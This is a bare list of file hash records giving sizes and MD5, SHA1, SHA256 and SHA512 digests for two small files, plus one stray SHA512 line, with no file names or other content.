SHA512: 06d6496b3c0780dc7462e9794bc5804d4b2aab672db8fa260733c8ff5d1c3ca2f05c294b25779e4d45d8cf5ed38d10dbe378315abe930a1c93d237664ab5bfbd

Filesize: 2B
MD5: f3b25701fe362ec84616a93a45ce9998
SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Filesize: 219B
MD5: c39e22147c18fc4352e58f4c000962ad
SHA1: 744d22c3741894018c1cabb9ab3fe4943ab3bf04
SHA256: 0863114b0d43b2f59f466939de7dbf7c6d15986a041ad46cad784b42f101ac9c
SHA512: 75cc751eba34585570c3f89848f743731a9153cced65c06c99d851dd724dab25dff610c413362f43be8729717e1a27bbd97861c2a81aaf75bebf3c38dea683bc